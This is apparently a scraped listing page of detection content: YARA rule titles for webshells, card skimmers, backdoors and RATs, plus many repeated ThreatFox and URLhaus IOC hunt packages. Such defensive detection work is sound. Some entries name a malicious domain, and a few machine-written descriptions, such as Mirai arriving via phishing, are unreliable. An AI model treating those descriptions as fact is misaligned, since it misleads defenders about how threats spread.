callTogether certificate
yara low
YARA rule: callTogether_certificate
Detects a cloaked file as JPG
yara high
Detects a cloaked file as JPG
DownExecute A
yara low
YARA rule: DownExecute_A
EmiratesStatement
yara low
The 'EmiratesStatement' YARA rule detects malicious files or emails associated with the Emirates threat group, likely targeting infrastructure
OrcaRAT
yara low
YARA rule: OrcaRAT
Pandora
yara low
YARA rule: Pandora
Qadars - Mobile part. Maybe Perkele.
yara low
Qadars - Mobile part. Maybe Perkele.
qti certificate
yara low
YARA rule: qti_certificate
SpyGate v2 9
yara low
YARA rule: SpyGate_v2_9
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 8 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 5 IOCs associated with ClearFake
ThreatFox: IClickFix IOCs
ioc-hunt high
DnsEvents
The IClick
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with Unknown Stealer
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Cobalt Strike
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Remcos
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 39 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 43 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mirai malware family is a botnet that compromises IoT devices by scanning for default credentials and deploying them to launch large-scale DDoS attacks. It typically arrives via phishing emails, compromised websites, or malicious updates distributed
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as Mozi
ZXProxy
yara low
YARA rule: ZXProxy
malicious LNK files
yara low
YARA rule: malicious_LNK_files
memory pivy
yara low
YARA rule: memory_pivy
memory shylock
yara low
YARA rule: memory_shylock
misc iocs
yara low
YARA rule: misc_iocs
Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP
ThreatFox: Aisuru IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Aisuru
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 17 IOCs associated with Mirai
ThreatFox: Mozi IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 16 IOCs associated with Mozi
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 19 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 21 IOCs associated with Unknown malware
ThreatFox: Unknown RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 13 IOCs associated with Unknown RAT
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with AdaptixC2
ThreatFox: Agent Tesla IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Agent Tesla
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 10 IOCs associated with AsyncRAT
ThreatFox: BianLian IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with BianLian
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 7 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
ThreatFox: Formbook IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Formbook
ThreatFox: PureRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with PureRAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 16 IOCs associated with Remcos
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Sliver
ThreatFox: SnappyClient IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with SnappyClient
ThreatFox: Stealc IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 15 IOCs associated with Stealc
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 14 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with VShell
tran duy linh
yara low
YARA rule: tran_duy_linh
Trojan Downloader - Flash Exploit Feb15
yara high
Trojan Downloader - Flash Exploit Feb15
eval with comments
yara low
YARA rule: eval_with_comments
fopo obfuscator
yara low
YARA rule: fopo_obfuscator
fromCharCode in unicode
yara low
YARA rule: fromCharCode_in_unicode
function through object
yara low
YARA rule: function_through_object
hex script
yara low
YARA rule: hex_script
html upload
yara low
YARA rule: html_upload
md5 cdn js link js
yara low
YARA rule: md5_cdn_js_link_js
obf base64 decode
yara low
YARA rule: obf_base64_decode
php malfunctions
yara low
YARA rule: php_malfunctions
php obf malfunctions
yara low
YARA rule: php_obf_malfunctions
php uname
yara low
YARA rule: php_uname
PM Email Sent By PHP Script
yara low
YARA rule: PM_Email_Sent_By_PHP_Script
PM Zip with js
yara low
YARA rule: PM_Zip_with_js
scriptkiddies
yara low
YARA rule: scriptkiddies
thetech org js
yara low
YARA rule: thetech_org_js
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 5 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 83 IOCs associated with Unknown malware
ThreatFox: 4h_rat IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with 4h_rat
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 7 IOCs associated with Cobalt Strike
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 13 IOCs associated with Remcos
ThreatFox: Tofsee IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 17 IOCs associated with Tofsee
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 48 IOCs associated with Vidar
Trojan W32 Gh0stMiancha 1 0 0
yara low
YARA rule: Trojan_W32_Gh0stMiancha_1_0_0
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 20 malicious URLs tagged as 32-bit
URLhaus: 94-183-232-247 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 94-183-232-247
URLhaus: botnet Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as botnet
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 58 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as Mozi
amasty biz
yara low
YARA rule: amasty_biz
amasty biz js
yara low
YARA rule: amasty_biz_js
atob js
yara low
YARA rule: atob_js
cloudfusion me
yara low
YARA rule: cloudfusion_me
credit card regex
yara low
YARA rule: credit_card_regex
gate php js
yara low
YARA rule: gate_php_js
googieplay js
yara low
YARA rule: googieplay_js
grelos v
yara low
YARA rule: grelos_v
hacked domains
yara low
YARA rule: hacked_domains
ip 5uu8 com
yara low
YARA rule: ip_5uu8_com
jquery code su
yara low
YARA rule: jquery_code_su
jquery code su multi
yara low
YARA rule: jquery_code_su_multi
mag php js
yara low
YARA rule: mag_php_js
mage cdn link
yara low
YARA rule: mage_cdn_link
md5 4aa900ddd4f1848a15c61a9b7acd5035
yara low
YARA rule: md5_4aa900ddd4f1848a15c61a9b7acd5035
md5 f797dd5d8e13fe5c8898dbe3beb3cc5b
yara low
YARA rule: md5_f797dd5d8e13fe5c8898dbe3beb3cc5b
onepage or checkout
yara low
YARA rule: onepage_or_checkout
returntosender
yara low
YARA rule: returntosender
sinlesspleasure com
yara low
YARA rule: sinlesspleasure_com
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 7 IOCs associated with Mirai
ThreatFox: Mozi IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 7 IOCs associated with Mozi
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with RedTail
ThreatFox: Tsunami IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Tsunami
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with XMRIG
ThreatFox: BeaverTail IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsUrlClickEvents
Hunt package for 9 IOCs associated with BeaverTail
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 8 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
ThreatFox: Xloader IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with Xloader
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with AsyncRAT
ThreatFox: BlackShades IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with BlackShades
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with Cobalt Strike
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 6 IOCs associated with Meterpreter
ThreatFox: NetWire RC IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 42 IOCs associated with NetWire RC
ThreatFox: RapidStealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 7 IOCs associated with RapidStealer
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with Remcos
ThreatFox: Vidar IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 9 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with VShell
Trafficanalyzer js
yara low
YARA rule: Trafficanalyzer_js
base64 hidden in image
yara low
YARA rule: base64_hidden_in_image
eval base64 decode a
yara low
YARA rule: eval_base64_decode_a
fake magentoupdate site
yara low
YARA rule: fake_magentoupdate_site
hidden file upload in 503
yara low
YARA rule: hidden_file_upload_in_503
hide data in jpeg
yara low
YARA rule: hide_data_in_jpeg
indoexploit autoexploiter
yara low
YARA rule: indoexploit_autoexploiter
ld preload backdoor
yara low
YARA rule: ld_preload_backdoor
md5 0105d05660329704bdb0ecd3fd3a473b
yara low
YARA rule: md5_0105d05660329704bdb0ecd3fd3a473b
md5 023a80d10d10d911989e115b477e42b5
yara low
YARA rule: md5_023a80d10d10d911989e115b477e42b5
md5 06e3ed58854daeacf1ed82c56a883b04
yara low
YARA rule: md5_06e3ed58854daeacf1ed82c56a883b04
md5 0b1bfb0bdc7e017baccd05c6af6943ea
yara low
YARA rule: md5_0b1bfb0bdc7e017baccd05c6af6943ea
md5 2495b460f28f45b40d92da406be15627
yara low
YARA rule: md5_2495b460f28f45b40d92da406be15627
md5 24f2df1b9d49cfb02d8954b08dba471f
yara low
YARA rule: md5_24f2df1b9d49cfb02d8954b08dba471f
md5 28690a72362e021f65bb74eecc54255e
yara low
YARA rule: md5_28690a72362e021f65bb74eecc54255e
md5 2c37d90dd2c9c743c273cb955dd83ef6
yara low
YARA rule: md5_2c37d90dd2c9c743c273cb955dd83ef6
md5 39ca2651740c2cef91eb82161575348b
yara low
YARA rule: md5_39ca2651740c2cef91eb82161575348b
md5 3ccdd51fe616c08daafd601589182d38
yara low
YARA rule: md5_3ccdd51fe616c08daafd601589182d38
md5 4adef02197f50b9cc6918aa06132b2f6
yara low
YARA rule: md5_4adef02197f50b9cc6918aa06132b2f6
md5 4b69af81b89ba444204680d506a8e0a1
yara low
YARA rule: md5_4b69af81b89ba444204680d506a8e0a1
md5 4c4b3d4ba5bce7191a5138efa2468679
yara low
YARA rule: md5_4c4b3d4ba5bce7191a5138efa2468679
md5 50be694a82a8653fa8b31d049aac721a
yara low
YARA rule: md5_50be694a82a8653fa8b31d049aac721a
md5 6eb201737a6ef3c4880ae0b8983398a9
yara low
YARA rule: md5_6eb201737a6ef3c4880ae0b8983398a9
md5 71a7c769e644d8cf3cf32419239212c7
yara low
YARA rule: md5_71a7c769e644d8cf3cf32419239212c7
md5 825a3b2a6abbe6abcdeda64a73416b3d
yara low
YARA rule: md5_825a3b2a6abbe6abcdeda64a73416b3d
md5 87cf8209494eedd936b28ff620e28780
yara low
YARA rule: md5_87cf8209494eedd936b28ff620e28780
md5 8e5f7f6523891a5dcefcbb1a79e5bbe9
yara low
YARA rule: md5_8e5f7f6523891a5dcefcbb1a79e5bbe9
md5 9b59cb5b557e46e1487ef891cedaccf7
yara low
YARA rule: md5_9b59cb5b557e46e1487ef891cedaccf7
md5 ab63230ee24a988a4a9245c2456e4874
yara low
YARA rule: md5_ab63230ee24a988a4a9245c2456e4874
md5 b3ee7ea209d2ff0d920dfb870bad8ce5
yara low
YARA rule: md5_b3ee7ea209d2ff0d920dfb870bad8ce5
md5 b579bff90970ec58862ea8c26014d643
yara low
YARA rule: md5_b579bff90970ec58862ea8c26014d643
md5 c647e85ad77fd9971ba709a08566935d
yara low
YARA rule: md5_c647e85ad77fd9971ba709a08566935d
md5 d201d61510f7889f1a47257d52b15fa2
yara low
YARA rule: md5_d201d61510f7889f1a47257d52b15fa2
md5 d30b23d1224438518d18e90c218d7c8b
yara low
YARA rule: md5_d30b23d1224438518d18e90c218d7c8b
md5 e03b5df1fa070675da8b6340ff4a67c2
yara low
YARA rule: md5_e03b5df1fa070675da8b6340ff4a67c2
md5 fb9e35bf367a106d18eb6aa0fe406437
yara low
YARA rule: md5_fb9e35bf367a106d18eb6aa0fe406437
md5 fd141197c89d27b30821f3de8627ac38
yara low
YARA rule: md5_fd141197c89d27b30821f3de8627ac38
obfuscated eval
yara low
YARA rule: obfuscated_eval
obfuscated globals
yara low
YARA rule: obfuscated_globals
overwrite globals hack
yara low
YARA rule: overwrite_globals_hack
T1027.011
imProcessCreate
Detects the execution of a binary from the Linux shared memory directory /dev/shm. This directory is a tmpfs mount backed entirely by RAM and is abused by attackers for fileless malware staging becaus
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Mirai
ThreatFox: Mozi IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 10 IOCs associated with Mozi
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 10 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 23 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 8 IOCs associated with SmartApeSG
ThreatFox: Venus Stealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Venus Stealer
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 17 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 14 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 31 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
ThreatFox: Eye Pyramid IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Eye Pyramid
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 18 IOCs associated with Nanocore RAT
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 12 IOCs associated with NetSupportManager RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 3 IOCs associated with Remus
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 5 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with VShell
ThreatFox: WannaCryptor IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 12 IOCs associated with WannaCryptor
URLhaus: 178-236-246-159 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 14 malicious URLs tagged as 178-236-246-159
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 28 malicious URLs tagged as 32-bit
URLhaus: 87-121-79-223 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as 87-121-79-223
URLhaus: 94-249-230-150 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 17 malicious URLs tagged as 94-249-230-150
URLhaus: botnet Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as botnet
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as ClearFake
URLhaus: d52f85 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as d52f85
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as Mozi
visbot
yara low
YARA rule: visbot
dump sales order
yara low
YARA rule: dump_sales_order
dump sales quote payment
yara low
YARA rule: dump_sales_quote_payment
eval post
yara low
YARA rule: eval_post
fopo webshell
yara low
YARA rule: fopo_webshell
is elf
yara low
YARA rule: is_elf
Lost Door
yara low
Lost Door
LuckyCat code tricks
yara low
LuckyCat code tricks
MacControl
yara low
MacControl
MacControl code tricks
yara low
MacControl code tricks
MacControl Identifying Strings
yara low
MacControl Identifying Strings
md5 64651cede2467fdeb1b3b7e6ff3f81cb
yara low
YARA rule: md5_64651cede2467fdeb1b3b7e6ff3f81cb
md5 6bf4910b01aa4f296e590b75a3d25642
yara low
YARA rule: md5_6bf4910b01aa4f296e590b75a3d25642
moose
yara low
YARA rule: moose
Detects strings from C#/VB Stealers and QuasarRat
spam mailer
yara low
YARA rule: spam_mailer
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 2 IOCs associated with Mirai
ThreatFox: Mozi IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 70 IOCs associated with Mozi
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 16 IOCs associated with ClearFake
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 3 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 13 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 17 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 15 IOCs associated with Cobalt Strike
ThreatFox: LockBit IOCs
ioc-hunt high
DnsEvents
Hunt package for 8 IOCs associated with LockBit
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with NetSupportManager RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 10 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with Remus
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 10 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 12 IOCs associated with VShell
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 52 malicious URLs tagged as 32-bit
URLhaus: botnet Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as botnet
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as Mozi
the backdoor registers an auto start service with the display name \
rule for cctv0
yara low
rule for cctv0
5 char code for LURK0
yara low
5 char code for LURK0
http://malwared.ru
yara low
http://malwared.ru
Match default bot in KINS leaked dropper, Zeus
Match protocol, process injects and windows exploit present in KINS dropper
korlia
yara low
YARA rule: korlia
IOC looks for events associated with the KORPLUG Backdoor linked to the recent operation greedy wonk activity.
fileless malware
yara low
fileless malware
Kwampirs dropper and main payload components
methodology sig looking for signs of lateral movement
rule for lurk0
yara low
rule for lurk0
5 char code for LURK0
yara low
5 char code for LURK0
Identifies KeyBase aka Kibex.
yara low
Identifies KeyBase aka Kibex.
Internal names found in LURK0/CCTV0 samples
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 25 IOCs associated with ClearFake
ThreatFox: Creal Stealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Creal Stealer
ThreatFox: Venus Stealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Venus Stealer
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 17 IOCs associated with Unknown malware
ThreatFox: Agent Tesla IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with Agent Tesla
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 20 IOCs associated with AsyncRAT
ThreatFox: BianLian IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with BianLian
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 14 IOCs associated with Cobalt Strike
ThreatFox: Luca Stealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Luca Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with Nanocore RAT
ThreatFox: NjRAT IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with NjRAT
ThreatFox: Phantom Stealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Phantom Stealer
ThreatFox: poscardstealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with poscardstealer
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 10 IOCs associated with Remcos
ThreatFox: TinyMet IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with TinyMet
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents
Hunt package for 8 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 15 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 13 IOCs associated with VShell
ThreatFox: WannaCryptor IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with WannaCryptor
ThreatFox: ZynorRAT IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with ZynorRAT
Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe
iexpl0re family
yara low
iexpl0re family
iexpl0re code features
yara low
iexpl0re code features
Strings used by iexpl0re
yara low
Strings used by iexpl0re
IMuler
yara low
IMuler
IMuler code tricks
yara low
IMuler code tricks
IMuler Identifying Strings
yara low
IMuler Identifying Strings
Insta11
yara low
Insta11
Insta11 code features
yara low
Insta11 code features
Insta11 Identifying Strings
yara low
Insta11 Identifying Strings
Dynamic DLL (Malicious)
yara low
Dynamic DLL (Malicious)
Dynamic DLL abuse executable
yara low
Dynamic DLL abuse executable
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Kimwolf
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Evilginx
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with Mirai
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
